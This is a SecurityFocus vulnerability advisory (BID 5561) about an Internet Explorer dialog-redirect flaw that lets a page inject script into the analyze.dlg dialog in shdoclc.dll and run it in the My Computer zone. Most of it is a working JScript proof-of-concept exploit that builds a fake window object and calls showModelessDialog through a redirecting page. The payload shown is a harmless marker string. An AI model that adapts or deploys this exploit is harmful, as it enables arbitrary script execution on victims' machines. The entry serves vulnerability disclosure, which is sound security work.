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source: https://www.securityfocus.com/bid/5561/info
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Microsoft Internet Explorer includes support for dialog windows through script calls to the two functions showModalDialog and showModelessDialog. These functions accept a URL location for the dialog content, and an option argument parameter to allow data to be passed to the dialog from the calling page.
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A check is done to ensure that data is only passed to dialogs located in the same domain as the calling page. This prevents a malicious party from injecting content into arbitrary dialogs. However, if the URL provided as the dialog source redirects to a second location, only the first is subject to this security check.
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Exploitation may allow malicious content to be inserted into sensitive dialogs. Execution of arbitrary script within the Local Computer Zone has been demonstrated.
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This variant is related to the injection of malicious content into the analyze.dlg dialogue included in shdoclc.dll. This issue was originally included in BID 4527, however a new entry has been allocated to cover the patch released in Microsoft advisory MS02-047.
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<script language="jscript">
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// HTML to be injected (will run in the "My Computer" zone)
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var sHTML="<b>We're in!</b>";
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// Object to return from tags("link"), must be a function because they use
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// objects(i) instead of objects[i], VB style collection access.
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function oExploit(iSec) {
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return {
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// Satisfy line 201
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rel:"stylesheet",
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// Satisfy line 204
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readyState:"exploit",
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// Exploit line 205
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href:sHTML
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};
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}
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// A length property so it will enter the loop
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oExploit.length=1;
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// A fake window object, so no errors will be raised during the process,
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// the custom "tags" method will return an empty array for any element
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// other than our target (<link>), in which case it will return the oExploit
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// object above.
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var oSecurity={
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document:{
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all:{
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tags:function (sTag) {
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return sTag=="link" ? oExploit : [];
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}
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}
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}
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}
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// Run exploit, getFile.asp redirects to res://shdoclc.dll/analyze.dlg
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// and oSecurity (fake window) is sent as the dialog argument.
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showModelessDialog("getFile.asp",oSecurity);
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</script> |